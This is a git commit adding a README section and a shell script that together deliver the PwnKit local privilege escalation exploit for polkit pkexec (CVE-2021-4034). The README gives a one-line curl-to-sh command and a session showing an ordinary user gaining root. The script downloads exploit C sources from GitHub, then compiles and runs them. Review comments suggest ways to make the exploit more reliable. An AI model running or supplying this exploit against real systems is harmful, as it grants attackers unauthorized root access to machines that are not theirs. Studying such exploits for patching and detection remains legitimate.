One-liner root

Nicholas Ferreira 2022-01-27 10:09:47 -03:00 committed by Davide Berardi
parent 54b79d1cd1
commit 465b0f35b2
2 changed files with 34 additions and 0 deletions


@ -36,3 +36,21 @@ vagrant@ubuntu-impish:~/CVE-2021-4034$
## About Polkit pkexec for Linux ## About Polkit pkexec for Linux
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
# One command root
`curl -s https://raw.githubusercontent.com/Nickguitar/CVE-2021-4034/main/cve-2021-4034.sh | sh`
```
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root
```
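Review bot: The one-liner under "# One command root" fetches the script from raw.githubusercontent.com/Nickguitar/CVE-2021-4034, while the sample session directly below it and the URL variable in cve-2021-4034.sh both use berdav/CVE-2021-4034. A reader who copies the first command pipes a script from a different repository into sh than the one this commit adds, so point the inline command at the same berdav URL as the transcript. The new heading also uses a single # where the surrounding sections use ##.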

cve-2021-4034.sh Normal file

@ -0,0 +1,16 @@
#!/usr/bin/env sh
set -e
URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'
for EXPLOIT in "${URL}/cve-2021-4034.c" \
"${URL}/pwnkit.c" \
"${URL}/Makefile"
do
curl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"
done
make
./cve-2021-4034
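Review bot: The loop writes cve-2021-4034.c, pwnkit.c and Makefile into the caller's current directory and then runs make there, so when the script is piped into sh from an arbitrary location it overwrites any existing Makefile and leaves build artifacts behind; creating a scratch directory with mktemp -d and changing into it first would contain that. Two smaller points on the download line: URL already ends in / so "${URL}/pwnkit.c" expands with a double slash, and curl -sLO without -f returns success on an HTTP error page, so the wget fallback never triggers and make runs on whatever was saved. The files are also taken from the mutable main branch with no checksum, so what gets compiled can differ from what was reviewed; pinning the URL to a commit would address that.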